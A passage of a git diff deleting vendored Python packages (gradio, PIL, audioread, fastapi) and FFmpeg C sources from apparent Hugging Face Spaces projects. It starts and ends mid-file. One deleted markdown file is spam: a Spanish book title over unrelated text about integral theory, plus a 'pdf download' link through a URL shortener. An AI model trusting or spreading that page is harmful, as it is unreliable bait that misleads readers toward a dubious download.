- lookupMap = NonhashableDict(t.table.LookupList.Lookup) - t.table.FeatureList.mapLookups(lookupMap) - t.table.LookupList.mapLookups(lookupMap) - - t.table.LookupList.LookupCount = len(t.table.LookupList.Lookup) - - if GDEF and GDEF.table.Version >= 0x00010002: - markFilteringSetMap = NonhashableDict( - GDEF.table.MarkGlyphSetsDef.Coverage - ) - t.table.LookupList.mapMarkFilteringSets(markFilteringSetMap) - - # TODO FeatureParams nameIDs diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/gradio/components/radio.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/gradio/components/radio.py deleted file mode 100644 index f379badbead20c8de7afeae040a4dc8591e53da2..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/gradio/components/radio.py +++ /dev/null @@ -1,193 +0,0 @@ -"""gr.Radio() component.""" - -from __future__ import annotations - -from typing import Any, Callable, Literal - -from gradio_client.documentation import document, set_documentation_group -from gradio_client.serializing import StringSerializable - -from gradio.components.base import FormComponent, IOComponent, _Keywords -from gradio.deprecation import warn_deprecation, warn_style_method_deprecation -from gradio.events import Changeable, EventListenerMethod, Inputable, Selectable -from gradio.interpretation import NeighborInterpretable - -set_documentation_group("component") - - -@document() -class Radio( - FormComponent, - Selectable, - Changeable, - Inputable, - IOComponent, - StringSerializable, - NeighborInterpretable, -): - """ - Creates a set of radio buttons of which only one can be selected. - Preprocessing: passes the value of the selected radio button as a {str} or its index as an {int} into the function, depending on `type`. - Postprocessing: expects a {str} corresponding to the value of the radio button to be selected. 
- Examples-format: a {str} representing the radio option to select. - - Demos: sentence_builder, titanic_survival, blocks_essay - """ - - def __init__( - self, - choices: list[str] | None = None, - *, - value: str | Callable | None = None, - type: str = "value", - label: str | None = None, - info: str | None = None, - every: float | None = None, - show_label: bool = True, - container: bool = True, - scale: int | None = None, - min_width: int = 160, - interactive: bool | None = None, - visible: bool = True, - elem_id: str | None = None, - elem_classes: list[str] | str | None = None, - **kwargs, - ): - """ - Parameters: - choices: list of options to select from. - value: the button selected by default. If None, no button is selected by default. If callable, the function will be called whenever the app loads to set the initial value of the component. - type: Type of value to be returned by component. "value" returns the string of the choice selected, "index" returns the index of the choice selected. - label: component name in interface. - info: additional component description. - every: If `value` is a callable, run the function 'every' number of seconds while the client connection is open. Has no effect otherwise. Queue must be enabled. The event can be accessed (e.g. to cancel it) via this component's .load_event attribute. - show_label: if True, will display label. - container: If True, will place the component in a container - providing some extra padding around the border. - scale: relative width compared to adjacent Components in a Row. For example, if Component A has scale=2, and Component B has scale=1, A will be twice as wide as B. Should be an integer. - min_width: minimum pixel width, will wrap if not sufficient screen space to satisfy this value. If a certain scale value results in this Component being narrower than min_width, the min_width parameter will be respected first. 
- interactive: if True, choices in this radio group will be selectable; if False, selection will be disabled. If not provided, this is inferred based on whether the component is used as an input or output. - visible: If False, component will be hidden. - elem_id: An optional string that is assigned as the id of this component in the HTML DOM. Can be used for targeting CSS styles. - elem_classes: An optional list of strings that are assigned as the classes of this component in the HTML DOM. Can be used for targeting CSS styles. - """ - self.choices = choices or [] - valid_types = ["value", "index"] - if type not in valid_types: - raise ValueError( - f"Invalid value for parameter `type`: {type}. Please choose from one of: {valid_types}" - ) - self.type = type - self.select: EventListenerMethod - """ - Event listener for when the user selects Radio option. - Uses event data gradio.SelectData to carry `value` referring to label of selected option, and `index` to refer to index. - See EventData documentation on how to use this event data. 
- """ - IOComponent.__init__( - self, - label=label, - info=info, - every=every, - show_label=show_label, - container=container, - scale=scale, - min_width=min_width, - interactive=interactive, - visible=visible, - elem_id=elem_id, - elem_classes=elem_classes, - value=value, - **kwargs, - ) - NeighborInterpretable.__init__(self) - - def get_config(self): - return { - "choices": self.choices, - "value": self.value, - **IOComponent.get_config(self), - } - - def example_inputs(self) -> dict[str, Any]: - return { - "raw": self.choices[0] if self.choices else None, - "serialized": self.choices[0] if self.choices else None, - } - - @staticmethod - def update( - value: Any | Literal[_Keywords.NO_VALUE] | None = _Keywords.NO_VALUE, - choices: list[str] | None = None, - label: str | None = None, - info: str | None = None, - show_label: bool | None = None, - container: bool | None = None, - scale: int | None = None, - min_width: int | None = None, - interactive: bool | None = None, - visible: bool | None = None, - ): - return { - "choices": choices, - "label": label, - "info": info, - "show_label": show_label, - "container": container, - "scale": scale, - "min_width": min_width, - "interactive": interactive, - "visible": visible, - "value": value, - "__type__": "update", - } - - def preprocess(self, x: str | None) -> str | int | None: - """ - Parameters: - x: selected choice - Returns: - selected choice as string or index within choice list - """ - if self.type == "value": - return x - elif self.type == "index": - if x is None: - return None - else: - return self.choices.index(x) - else: - raise ValueError( - f"Unknown type: {self.type}. Please choose from: 'value', 'index'." 
- ) - - def get_interpretation_neighbors(self, x): - choices = list(self.choices) - choices.remove(x) - return choices, {} - - def get_interpretation_scores( - self, x, neighbors, scores: list[float | None], **kwargs - ) -> list: - """ - Returns: - Each value represents the interpretation score corresponding to each choice. - """ - scores.insert(self.choices.index(x), None) - return scores - - def style( - self, - *, - item_container: bool | None = None, - container: bool | None = None, - **kwargs, - ): - """ - This method is deprecated. Please set these arguments in the constructor instead. - """ - warn_style_method_deprecation() - if item_container is not None: - warn_deprecation("The `item_container` parameter is deprecated.") - if container is not None: - self.container = container - return self diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/gradio/deploy_space.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/gradio/deploy_space.py deleted file mode 100644 index 9014b4e24ea2987d05dcf6ad58a6f0ee437646de..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/gradio/deploy_space.py +++ /dev/null @@ -1,175 +0,0 @@ -from __future__ import annotations - -import argparse -import os -import re - -import huggingface_hub - -import gradio as gr - -repo_directory = os.getcwd() -readme_file = os.path.join(repo_directory, "README.md") -github_action_template = os.path.join( - os.path.dirname(__file__), "deploy_space_action.yaml" -) - - -def add_configuration_to_readme( - title: str | None, - app_file: str | None, -) -> dict: - configuration = {} - - dir_name = os.path.basename(repo_directory) - if title is None: - title = input(f"Enter Spaces app title [{dir_name}]: ") or dir_name - formatted_title = format_title(title) - if formatted_title != title: - print(f"Formatted to {formatted_title}. 
") - configuration["title"] = formatted_title - - if app_file is None: - for file in os.listdir(repo_directory): - file_path = os.path.join(repo_directory, file) - if not os.path.isfile(file_path) or not file.endswith(".py"): - continue - - with open(file_path, encoding="utf-8", errors="ignore") as f: - content = f.read() - if "import gradio" in content: - app_file = file - break - - app_file = ( - input(f"Enter Gradio app file {f'[{app_file}]' if app_file else ''}: ") - or app_file - ) - if not app_file or not os.path.exists(app_file): - raise FileNotFoundError("Failed to find Gradio app file.") - configuration["app_file"] = app_file - - configuration["sdk"] = "gradio" - configuration["sdk_version"] = gr.__version__ - huggingface_hub.metadata_save(readme_file, configuration) - - configuration["hardware"] = ( - input( - f"Enter Spaces hardware ({', '.join(hardware.value for hardware in huggingface_hub.SpaceHardware)}) [cpu-basic]: " - ) - or "cpu-basic" - ) - - secrets = {} - if input("Any Spaces secrets (y/n) [n]: ") == "y": - while True: - secret_name = input("Enter secret name (leave blank to end): ") - if not secret_name: - break - secret_value = input(f"Enter secret value for {secret_name}: ") - secrets[secret_name] = secret_value - configuration["secrets"] = secrets - - requirements_file = os.path.join(repo_directory, "requirements.txt") - if ( - not os.path.exists(requirements_file) - and input("Create requirements.txt file? (y/n) [n]: ").lower() == "y" - ): - while True: - requirement = input("Enter a dependency (leave blank to end): ") - if not requirement: - break - with open(requirements_file, "a") as f: - f.write(requirement + "\n") - - if ( - input( - "Create Github Action to automatically update Space on 'git push'? 
[n]: " - ).lower() - == "y" - ): - track_branch = input("Enter branch to track [main]: ") or "main" - github_action_file = os.path.join( - repo_directory, ".github/workflows/update_space.yml" - ) - os.makedirs(os.path.dirname(github_action_file), exist_ok=True) - with open(github_action_template) as f: - github_action_content = f.read() - github_action_content = github_action_content.replace("$branch", track_branch) - with open(github_action_file, "w") as f: - f.write(github_action_content) - - print( - "Github Action created. Add your Hugging Face write token (from https://huggingface.co/settings/tokens) as an Actions Secret named 'hf_token' to your GitHub repository. This can be set in your repository's settings page." - ) - - return configuration - - -def format_title(title: str): - title = title.replace(" ", "_") - title = re.sub(r"[^a-zA-Z0-9\-._]", "", title) - title = re.sub("-+", "-", title) - while title.startswith("."): - title = title[1:] - return title - - -def deploy(): - if ( - os.getenv("SYSTEM") == "spaces" - ): # in case a repo with this function is uploaded to spaces - return - parser = argparse.ArgumentParser(description="Deploy to Spaces") - parser.add_argument("deploy") - parser.add_argument("--title", type=str, help="Spaces app title") - parser.add_argument("--app-file", type=str, help="File containing the Gradio app") - - args = parser.parse_args() - - hf_api = huggingface_hub.HfApi() - whoami = None - login = False - try: - whoami = hf_api.whoami() - if whoami["auth"]["accessToken"]["role"] != "write": - login = True - except OSError: - login = True - if login: - print("Need 'write' access token to create a Spaces repo.") - huggingface_hub.login(add_to_git_credential=False) - whoami = hf_api.whoami() - - configuration: None | dict = None - if os.path.exists(readme_file): - try: - configuration = huggingface_hub.metadata_load(readme_file) - except ValueError: - pass - - if configuration is None: - print( - f"Creating new Spaces Repo in 
'{repo_directory}'. Collecting metadata, press Enter to accept default value." - ) - configuration = add_configuration_to_readme( - args.title, - args.app_file, - ) - - space_id = huggingface_hub.create_repo( - configuration["title"], - space_sdk="gradio", - repo_type="space", - exist_ok=True, - space_hardware=configuration.get("hardware"), - ).repo_id - hf_api.upload_folder( - repo_id=space_id, - repo_type="space", - folder_path=repo_directory, - ) - if configuration.get("secrets"): - for secret_name, secret_value in configuration["secrets"].items(): - huggingface_hub.add_space_secret(space_id, secret_name, secret_value) - print(f"Space available at https://huggingface.co/spaces/{space_id}") diff --git a/spaces/cihyFjudo/fairness-paper-search/El nacimiento del mundo moderno conexiones y comparaciones globales en la era de las revoluciones (PDF).md b/spaces/cihyFjudo/fairness-paper-search/El nacimiento del mundo moderno conexiones y comparaciones globales en la era de las revoluciones (PDF).md deleted file mode 100644 index 36c5c0fe745c439847e66cfb523d08fd656b51ab..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/El nacimiento del mundo moderno conexiones y comparaciones globales en la era de las revoluciones (PDF).md +++ /dev/null @@ -1,6 +0,0 @@ -
    -

    When we speak of stages of consciousness, Integral Theory distinguishes between the slow evolutionary structure-stages (shown in the charts above) and the fast-access, often volatile, state-stages. These levels of consciousness take years to develop, and once someone reaches a given level, they will spend a good phase of their life in it. Consider a traditional person (amber altitude in the integral model) or a modern one (orange level): they can debate over dinner for years without ever understanding each other. Those stages, each carrying its own worldview, need time to change. On the other hand, anyone can have a peak experience or enter a spiritual state relatively quickly. For minutes, hours, or days (depending on the practice and the person's capacity), anyone at a traditional, modern, postmodern, or integral stage can enter a non-ordinary state of consciousness. The so-called Wilber-Combs lattice shows this difference, describing structure-stages (on the vertical axis) and state-stages (on the horizontal axis). Comparing the deep structure of the different experiences described in the major spiritual traditions, Wilber holds that states of consciousness also pass through stages of increasing depth (opening or awakening). He defines four of these state-stages: ordinary, subtle, causal, and non-dual.

    -

    Notice how the number of a given rung of the ladder in one quadrant corresponds to the same stage number in the others, and how individual psychology (Upper Left), worldviews and political orientations (Lower Left), and social systems (Lower Right) line up. For example, number 5 in the Upper-Left quadrant is the modern, self-made, independent rational self, which we mark with the color orange: the orange level. In evolution, this stage of development carries a scientific-rational worldview, which can be seen at stage 5 in the Lower-Left quadrant. This same stage produces corporate nation-states, as happened worldwide when the Western Enlightenment replaced the feudal empires of the Middle Ages, or in the case of colonization, with the activities of orange nations in other parts of the world, such as the British in India. All modern nation-states came into being when the orange level appeared.

    -

    el nacimiento del mundo moderno pdf download


    DOWNLOAD ->->->-> https://tinurli.com/2uwkgK



    -
    -
    \ No newline at end of file diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/PIL/McIdasImagePlugin.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/PIL/McIdasImagePlugin.py deleted file mode 100644 index 17c008b9a6a1218f6e51add4fda83acb92ee06ce..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/PIL/McIdasImagePlugin.py +++ /dev/null @@ -1,75 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# Basic McIdas support for PIL -# -# History: -# 1997-05-05 fl Created (8-bit images only) -# 2009-03-08 fl Added 16/32-bit support. -# -# Thanks to Richard Jones and Craig Swank for specs and samples. -# -# Copyright (c) Secret Labs AB 1997. -# Copyright (c) Fredrik Lundh 1997. -# -# See the README file for information on usage and redistribution. -# - -import struct - -from . import Image, ImageFile - - -def _accept(s): - return s[:8] == b"\x00\x00\x00\x00\x00\x00\x00\x04" - - -## -# Image plugin for McIdas area images. 
- - -class McIdasImageFile(ImageFile.ImageFile): - format = "MCIDAS" - format_description = "McIdas area file" - - def _open(self): - # parse area file directory - s = self.fp.read(256) - if not _accept(s) or len(s) != 256: - msg = "not an McIdas area file" - raise SyntaxError(msg) - - self.area_descriptor_raw = s - self.area_descriptor = w = [0] + list(struct.unpack("!64i", s)) - - # get mode - if w[11] == 1: - mode = rawmode = "L" - elif w[11] == 2: - # FIXME: add memory map support - mode = "I" - rawmode = "I;16B" - elif w[11] == 4: - # FIXME: add memory map support - mode = "I" - rawmode = "I;32B" - else: - msg = "unsupported McIdas format" - raise SyntaxError(msg) - - self.mode = mode - self._size = w[10], w[9] - - offset = w[34] + w[15] - stride = w[15] + w[10] * w[11] * w[14] - - self.tile = [("raw", (0, 0) + self.size, offset, (rawmode, stride, 1))] - - -# -------------------------------------------------------------------- -# registry - -Image.register_open(McIdasImageFile.format, McIdasImageFile, _accept) - -# no default extension diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/audioread/base.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/audioread/base.py deleted file mode 100644 index 8230e246f18879faa9d9649ceafee22499e6cb8b..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/audioread/base.py +++ /dev/null @@ -1,18 +0,0 @@ -# This file is part of audioread. -# Copyright 2021, Adrian Sampson. 
-# -# Permission is hereby granted, free of charge, to any person obtaining -# a copy of this software and associated documentation files (the -# "Software"), to deal in the Software without restriction, including -# without limitation the rights to use, copy, modify, merge, publish, -# distribute, sublicense, and/or sell copies of the Software, and to -# permit persons to whom the Software is furnished to do so, subject to -# the following conditions: -# -# The above copyright notice and this permission notice shall be -# included in all copies or substantial portions of the Software. - - -class AudioFile: - """The base class for all audio file types. - """ diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fastapi/responses.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fastapi/responses.py deleted file mode 100644 index c0a13b7555efc9d99c5c887fee1c94c88ba7e89c..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fastapi/responses.py +++ /dev/null @@ -1,34 +0,0 @@ -from typing import Any - -from starlette.responses import FileResponse as FileResponse # noqa -from starlette.responses import HTMLResponse as HTMLResponse # noqa -from starlette.responses import JSONResponse as JSONResponse # noqa -from starlette.responses import PlainTextResponse as PlainTextResponse # noqa -from starlette.responses import RedirectResponse as RedirectResponse # noqa -from starlette.responses import Response as Response # noqa -from starlette.responses import StreamingResponse as StreamingResponse # noqa - -try: - import ujson -except ImportError: # pragma: nocover - ujson = None # type: ignore - - -try: - import orjson -except ImportError: # pragma: nocover - orjson = None # type: ignore - - -class UJSONResponse(JSONResponse): - def render(self, content: Any) -> bytes: - assert ujson is not None, "ujson must be installed to use UJSONResponse" - return 
ujson.dumps(content, ensure_ascii=False).encode("utf-8") - - -class ORJSONResponse(JSONResponse): - def render(self, content: Any) -> bytes: - assert orjson is not None, "orjson must be installed to use ORJSONResponse" - return orjson.dumps( - content, option=orjson.OPT_NON_STR_KEYS | orjson.OPT_SERIALIZE_NUMPY - ) diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/adts_parser.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/adts_parser.c deleted file mode 100644 index f2e155fc99d1a4182e54a98d1926cfa9678fa30f..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/adts_parser.c +++ /dev/null @@ -1,81 +0,0 @@ -/* - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. 
- * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "config.h" - -#include -#include - -#include "adts_header.h" -#include "adts_parser.h" - -int av_adts_header_parse(const uint8_t *buf, uint32_t *samples, uint8_t *frames) -{ -#if CONFIG_ADTS_HEADER - GetBitContext gb; - AACADTSHeaderInfo hdr; - int err = init_get_bits8(&gb, buf, AV_AAC_ADTS_HEADER_SIZE); - if (err < 0) - return err; - err = ff_adts_header_parse(&gb, &hdr); - if (err < 0) - return err; - *samples = hdr.samples; - *frames = hdr.num_aac_frames; - return 0; -#else - return AVERROR(ENOSYS); -#endif -} - -int avpriv_adts_header_parse(AACADTSHeaderInfo **phdr, const uint8_t *buf, size_t size) -{ -#if CONFIG_ADTS_HEADER - int ret = 0; - int allocated = 0; - GetBitContext gb; - - if (!phdr || !buf || size < AV_AAC_ADTS_HEADER_SIZE) - return AVERROR_INVALIDDATA; - - if (!*phdr) { - allocated = 1; - *phdr = av_mallocz(sizeof(AACADTSHeaderInfo)); - } - if (!*phdr) - return AVERROR(ENOMEM); - - ret = init_get_bits8(&gb, buf, AV_AAC_ADTS_HEADER_SIZE); - if (ret < 0) { - if (allocated) - av_freep(phdr); - return ret; - } - - ret = ff_adts_header_parse(&gb, *phdr); - if (ret < 0) { - if (allocated) - av_freep(phdr); - return ret; - } - - return 0; -#else - return AVERROR(ENOSYS); -#endif -} diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/binkdsp.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/binkdsp.c deleted file mode 100644 index a357d3167207b5d47d3bb24933b5c8a53c32021b..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/binkdsp.c +++ /dev/null @@ -1,159 +0,0 @@ -/* - * Bink DSP routines - * Copyright (c) 2009 Konstantin Shishkov - * - * This file is part of FFmpeg. 
- * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -/** - * @file - * Bink DSP routines - */ - -#include "config.h" -#include "libavutil/attributes.h" -#include "binkdsp.h" - -#define A1 2896 /* (1/sqrt(2))<<12 */ -#define A2 2217 -#define A3 3784 -#define A4 -5352 - -#define MUL(X,Y) ((int)((unsigned)(X) * (Y)) >> 11) - -#define IDCT_TRANSFORM(dest,s0,s1,s2,s3,s4,s5,s6,s7,d0,d1,d2,d3,d4,d5,d6,d7,munge,src) {\ - const int a0 = (src)[s0] + (src)[s4]; \ - const int a1 = (src)[s0] - (src)[s4]; \ - const int a2 = (src)[s2] + (src)[s6]; \ - const int a3 = MUL(A1, (src)[s2] - (src)[s6]); \ - const int a4 = (src)[s5] + (src)[s3]; \ - const int a5 = (src)[s5] - (src)[s3]; \ - const int a6 = (src)[s1] + (src)[s7]; \ - const int a7 = (src)[s1] - (src)[s7]; \ - const int b0 = a4 + a6; \ - const int b1 = MUL(A3, a5 + a7); \ - const int b2 = MUL(A4, a5) - b0 + b1; \ - const int b3 = MUL(A1, a6 - a4) - b2; \ - const int b4 = MUL(A2, a7) + b3 - b1; \ - (dest)[d0] = munge(a0+a2 +b0); \ - (dest)[d1] = munge(a1+a3-a2+b2); \ - (dest)[d2] = munge(a1-a3+a2+b3); \ - (dest)[d3] = munge(a0-a2 -b4); \ - (dest)[d4] = munge(a0-a2 +b4); \ - (dest)[d5] = munge(a1-a3+a2-b3); \ - (dest)[d6] = munge(a1+a3-a2-b2); \ - (dest)[d7] = munge(a0+a2 -b0); \ -} -/* end IDCT_TRANSFORM macro */ - -#define MUNGE_NONE(x) (x) 
-#define IDCT_COL(dest,src) IDCT_TRANSFORM(dest,0,8,16,24,32,40,48,56,0,8,16,24,32,40,48,56,MUNGE_NONE,src) - -#define MUNGE_ROW(x) (((x) + 0x7F)>>8) -#define IDCT_ROW(dest,src) IDCT_TRANSFORM(dest,0,1,2,3,4,5,6,7,0,1,2,3,4,5,6,7,MUNGE_ROW,src) - -static inline void bink_idct_col(int *dest, const int32_t *src) -{ - if ((src[8]|src[16]|src[24]|src[32]|src[40]|src[48]|src[56])==0) { - dest[0] = - dest[8] = - dest[16] = - dest[24] = - dest[32] = - dest[40] = - dest[48] = - dest[56] = src[0]; - } else { - IDCT_COL(dest, src); - } -} - -static void bink_idct_c(int32_t *block) -{ - int i; - int temp[64]; - - for (i = 0; i < 8; i++) - bink_idct_col(&temp[i], &block[i]); - for (i = 0; i < 8; i++) { - IDCT_ROW( (&block[8*i]), (&temp[8*i]) ); - } -} - -static void bink_idct_add_c(uint8_t *dest, int linesize, int32_t *block) -{ - int i, j; - - bink_idct_c(block); - for (i = 0; i < 8; i++, dest += linesize, block += 8) - for (j = 0; j < 8; j++) - dest[j] += block[j]; -} - -static void bink_idct_put_c(uint8_t *dest, int linesize, int32_t *block) -{ - int i; - int temp[64]; - for (i = 0; i < 8; i++) - bink_idct_col(&temp[i], &block[i]); - for (i = 0; i < 8; i++) { - IDCT_ROW( (&dest[i*linesize]), (&temp[8*i]) ); - } -} - -static void scale_block_c(const uint8_t src[64]/*align 8*/, uint8_t *dst/*align 8*/, int linesize) -{ - int i, j; - uint16_t *dst1 = (uint16_t *) dst; - uint16_t *dst2 = (uint16_t *)(dst + linesize); - - for (j = 0; j < 8; j++) { - for (i = 0; i < 8; i++) { - dst1[i] = dst2[i] = src[i] * 0x0101; - } - src += 8; - dst1 += linesize; - dst2 += linesize; - } -} - -static void add_pixels8_c(uint8_t *av_restrict pixels, int16_t *block, - int line_size) -{ - int i; - - for (i = 0; i < 8; i++) { - pixels[0] += block[0]; - pixels[1] += block[1]; - pixels[2] += block[2]; - pixels[3] += block[3]; - pixels[4] += block[4]; - pixels[5] += block[5]; - pixels[6] += block[6]; - pixels[7] += block[7]; - pixels += line_size; - block += 8; - } -} - -av_cold void 
ff_binkdsp_init(BinkDSPContext *c) -{ - c->idct_add = bink_idct_add_c; - c->idct_put = bink_idct_put_c; - c->scale_block = scale_block_c; - c->add_pixels8 = add_pixels8_c; -} diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/dnxhddata.h b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/dnxhddata.h deleted file mode 100644 index ea36feb0a2a4e792466962e7d464c041d8a7b37b..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/dnxhddata.h +++ /dev/null @@ -1,95 +0,0 @@ -/* - * VC3/DNxHD decoder. - * Copyright (c) 2007 SmartJog S.A., Baptiste Coudurier - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. 
- * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#ifndef AVCODEC_DNXHDDATA_H -#define AVCODEC_DNXHDDATA_H - -#include -#include "avcodec.h" -#include "libavutil/attributes.h" -#include "libavutil/intreadwrite.h" -#include "libavutil/rational.h" - -/** Additional profile info flags */ -#define DNXHD_INTERLACED (1<<0) -#define DNXHD_MBAFF (1<<1) -#define DNXHD_444 (1<<2) - -/** Frame headers, extra 0x00 added to end for parser */ -#define DNXHD_HEADER_INITIAL 0x000002800100 -#define DNXHD_HEADER_444 0x000002800200 - -/** Indicate that a CIDEntry value must be read in the bitstream */ -#define DNXHD_VARIABLE 0 - -typedef struct CIDEntry { - int cid; - unsigned int width, height; - unsigned int frame_size; - unsigned int coding_unit_size; - uint16_t flags; - int index_bits; - int bit_depth; - int eob_index; - const uint8_t *luma_weight, *chroma_weight; - const uint8_t *dc_codes, *dc_bits; - const uint16_t *ac_codes; - const uint8_t *ac_bits, *ac_info; - const uint16_t *run_codes; - const uint8_t *run_bits, *run; - int bit_rates[5]; ///< Helper to choose variants, rounded to nearest 5Mb/s - AVRational packet_scale; -} CIDEntry; - -const CIDEntry *ff_dnxhd_get_cid_table(int cid); -int ff_dnxhd_find_cid(AVCodecContext *avctx, int bit_depth); -void ff_dnxhd_print_profiles(AVCodecContext *avctx, int loglevel); - -static av_always_inline uint64_t ff_dnxhd_check_header_prefix_hr(uint64_t prefix) -{ - uint64_t data_offset = prefix >> 16; - if ((prefix & 0xFFFF0000FFFFLL) == 0x0300 && - data_offset >= 0x0280 && data_offset <= 0x2170 && - (data_offset & 3) == 0) - return prefix; - return 0; -} - -static av_always_inline uint64_t ff_dnxhd_check_header_prefix(uint64_t prefix) -{ - if (prefix == DNXHD_HEADER_INITIAL || - prefix == DNXHD_HEADER_444 || - ff_dnxhd_check_header_prefix_hr(prefix)) - return 
prefix; - return 0; -} - -static av_always_inline uint64_t ff_dnxhd_parse_header_prefix(const uint8_t *buf) -{ - uint64_t prefix = AV_RB32(buf); - prefix = (prefix << 16) | buf[4] << 8; - return ff_dnxhd_check_header_prefix(prefix); -} - -int ff_dnxhd_get_frame_size(int cid); -int ff_dnxhd_get_hr_frame_size(int cid, int w, int h); - -#endif /* AVCODEC_DNXHDDATA_H */ diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/hdrdec.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/hdrdec.c deleted file mode 100644 index 998227744b3f3c7d8e0a5d371156264fe17a25bd..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/hdrdec.c +++ /dev/null @@ -1,231 +0,0 @@ -/* - * Radiance HDR image format - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. 
- * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "avcodec.h" -#include "bytestream.h" -#include "codec_internal.h" -#include "decode.h" -#include "thread.h" - -#define MINELEN 8 -#define MAXELEN 0x7fff - -static int hdr_get_line(GetByteContext *gb, uint8_t *buffer, int size) -{ - int n = 0, c; - - memset(buffer, 0, size); - - do { - c = bytestream2_get_byte(gb); - if (n < size - 1) - buffer[n++] = c; - } while (bytestream2_get_bytes_left(gb) > 0 && c != '\n'); - - return 0; -} - -static float convert(int expo, int val) -{ - if (expo == -128) { - return 0.f; - } else { - const float v = val / 256.f; - - return ldexpf(v, expo); - } -} - -static int decompress(uint8_t *scanline, int w, GetByteContext *gb, const uint8_t *start) -{ - int rshift = 0; - - while (w > 0) { - if (bytestream2_get_bytes_left(gb) < 4) - return AVERROR_INVALIDDATA; - scanline[0] = bytestream2_get_byte(gb); - scanline[1] = bytestream2_get_byte(gb); - scanline[2] = bytestream2_get_byte(gb); - scanline[3] = bytestream2_get_byte(gb); - - if (scanline[0] == 1 && - scanline[1] == 1 && - scanline[2] == 1) { - int run = scanline[3]; - for (int i = run << rshift; i > 0 && w > 0 && scanline >= start + 4; i--) { - memcpy(scanline, scanline - 4, 4); - scanline += 4; - w -= 4; - } - rshift += 8; - if (rshift > 16) - break; - } else { - scanline += 4; - w--; - rshift = 0; - } - } - - return 1; -} - -static int hdr_decode_frame(AVCodecContext *avctx, AVFrame *p, - int *got_frame, AVPacket *avpkt) -{ - int width = 0, height = 0; - GetByteContext gb; - uint8_t line[512]; - float sar; - int ret; - - bytestream2_init(&gb, avpkt->data, avpkt->size); - hdr_get_line(&gb, line, sizeof(line)); - if (memcmp("#?RADIANCE\n", line, 11)) - return AVERROR_INVALIDDATA; - - do { - hdr_get_line(&gb, line, sizeof(line)); - if (sscanf(line, 
